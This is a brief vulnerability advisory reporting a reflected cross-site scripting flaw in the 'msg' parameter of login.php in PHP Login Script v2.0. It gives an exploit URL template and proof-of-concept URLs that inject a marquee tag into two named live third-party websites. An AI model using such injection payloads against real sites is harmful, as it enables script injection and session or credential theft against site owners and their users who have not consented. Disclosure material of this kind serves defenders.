PHP Login Script version 2.0 suffers from a cross site scripting vulnerability.
6a12219997b095202cbd5aaa5f2d6ac30483abe8709a9d07c4bd74eca78aa35c
[+] Cross Site Scripting on PHP Login Script v2.0
[+] Date: 24/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://php-login-script.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: login.php
[+] Version: v2.0
[+] Exploit : http://host/patch/login.php?msg=[XSS]
[+] PoC : http://tkenu.com/login/login.php?msg=<marquee>Xss%20By%20Felipe</marquee>
http://www.natpcs.com.au/admin/login.php?msg=<marquee>Xss By Felipe</marquee>